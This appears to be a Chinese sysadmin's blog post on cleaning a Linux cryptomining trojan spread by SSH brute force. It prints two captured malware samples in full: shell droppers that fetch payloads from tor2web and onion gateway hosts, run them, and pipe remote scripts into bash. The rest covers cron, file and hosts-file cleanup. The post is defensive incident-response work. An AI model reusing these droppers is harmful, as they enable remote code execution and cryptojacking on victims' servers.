菜鸟硬杠挖矿木马“rvlss”，“bffbe”，“wlvly”

最近有几台新上的服务器被攻击了，攻击方式主要仍然是弱密码攻击，被攻击后还会用证书去尝试登录网段内所有的机器， 所以，有免密登录的， 弱密码的基本都中招，中毒后服务器50%负载（后来群友提示，带有超线程的处理器被挖矿，超线程不算入核心）， 半数的处理器核心持续100% ，常用命令反应变得较为迟钝。

1、以下是病毒示例

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
t=tencentxjy5kpccv
dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
for i in $dir /tmp /var/tmp /dev/shm /usr/bin ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
x() {
f=/int
d=./$(date|md5sum|cut -f1 -d-)
wget -t1 -T180 -qU- --no-check-certificate $1$f -O$d || curl -m180 -fsSLkA- $1$f -o$d
chmod +x $d;$d;rm -f $d
}
u() {
x=/crn
wget -t1 -T180 -qU- -O- --no-check-certificate $1$x || curl -m180 -fsSLkA- $1$x
}
for h in tor2web.io tor2web.in d2web.org onion.mn tor2web.to onion.to onion.in.net 4tor.ml onion.glass civiclink.network tor2web.su onion.ly onion.pet onion.ws
do
if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
x tencentxjy5kpccv.$h
else
break
fi
done

if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
(
u $t.tor2web.io ||
u $t.d2web.org ||
u $t.onion.mn ||
u $t.tor2web.in ||
u $t.tor2web.to ||
u $t.onion.to ||
u $t.onion.in.net ||
u $t.4tor.ml ||
u $t.onion.glass ||
u $t.civiclink.network ||
u $t.tor2web.su ||
u $t.onion.ly ||
u $t.onion.pet ||
u $t.onion.ws
)|bash
fi

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "trumpzwlvlyrvlss")

sockz() {
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$(($c https://doh.centraleu.pi-dns.com/$p ||
    $c https://dns.twnic.tw/$p ||
    $c https://dns.rubyfish.cn/$p ||
    $c https://doh.dns.sb/$p ; host -W 5 relay.tor2socks.in|awk {'print $NF'})\
    | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|sort -uR|head -1 )
}

fexe() {
for i in $d /tmp /var/tmp /dev/shm /usr/bin ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

u() {
sockz
fexe
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
$c -x socks5h://$s:9050 $t.onion$f -o$x || $c $1$f -o$x
chmod +x $x;$x;rm -f $x
}

for h in tor2web.in tor2web.io tor2web.to tor2web.su
do
if ! ls /proc/$(head -1 /tmp/.X11-unix/00)/io; then
u $t.$h
else
break
fi
done

一共两个样本， 这两个样本是在不同的服务器上面发现的

解决思路

#首先利用htop，将占用最高的6位随机码进程f9然后回车 kill掉。
#清理.ssh 文件夹，删除所有的免密登录

#第二步键入命令，然后清除不明的定时执行，例如下面三项：
# * * * * /root/.bffbe > /dev/null 2>&1 &
#* * * * /root/.wlvly.sh > /dev/null 2>&1 &
#* * * * /root/.rvlss.sh > /dev/null 2>&1 &
crontab -e  



#第三步，同样清楚定时执行，（文件形式）
rm -rf /etc/cron.d/0rvlss 
rm -rf /etc/cron.d/0bffbe
rm -rf /etc/cron.d/0wlvly

#尝试停掉，定时执行的目录写入权限，这个不清楚有没有效果
#本人因为时间原因还没有详细了解定时执行的逻辑
chmod -R 400 /etc/cron.d
#ls /etc/cron.d


#删除生成的脚本文件
#ps：上面代码执行有一段需要从网络上下载脚本，在删除下载脚本的时候，提示无权限， 后来查到隐藏属性

# 查看隐藏属性的命令
 lsattr  .rvlss
 
#清理隐藏属性，并删除脚本（三个，服务器可能中的是其中的一种）
chattr -i /root/*.rvlss*  
rm -rf /root/*.rvlss*
chattr -i /opt/*rvlss*
rm -rf /opt/*rvlss*

 chattr -i /root/*bffbe*
rm -rf /root/*bffbe*
chattr -i /opt/*bffbe*
rm -rf /opt/*bffbe*



 chattr -i /root/*wlvly*
rm -rf /root/*wlvly*
chattr -i /opt/*wlvly*
rm -rf /opt/*wlvly*

#脚本在感染宿主机后，会从网络上下载脚本，且，挖矿要连接矿池
#所以此处屏蔽了脚本中所有的域名
#事实证明，这一步其实是起着关键的作用，如果从网络入口进行屏蔽，效果显著。（此处是主机上脚本）
echo 0.0.0.0 tor2web.io tor2web.in tor2web.to tor2socks.in d2web.org onion.mn onion.to  >> /etc/hosts
echo 0.0.0.0 onion.glass onion.in.net onion.ly onion.pet onion.ws 4tor.ml civiclink.network  >> /etc/hosts
echo 0.0.0.0 tor2web.su doh.centraleu.pi-dns.com dns.twnic.tw dns.rubyfish.cn doh.dns.sb trumpzwlvlyrvlss.onion >>/etc/hosts

#脚本有检测hosts屏蔽的功能， 在下一步未执行的时候
#三项其中的两项会被病毒删掉。（侧面证明网络屏蔽域名确实有效）
#所以才有下一步的操作，需要ps -aux 查询所有的进程
#删掉5-6位随机码的一异常进程，此步操作至关重要，解决了大8成的服务器病毒重启。

#剩下的两成，因本人学艺不精，仍然存在问题，后来删掉dns服务器地址解决，临时方法

另外，找到一个腾讯云的文章有提到类似情况以及解释，给大家参考

警惕Linux挖矿木马SystemMiner通过SSH爆破入侵攻击

阿里云的服务器

方法比较土， 高手路过勿喷，如有解决方法，可指导一下，感激不尽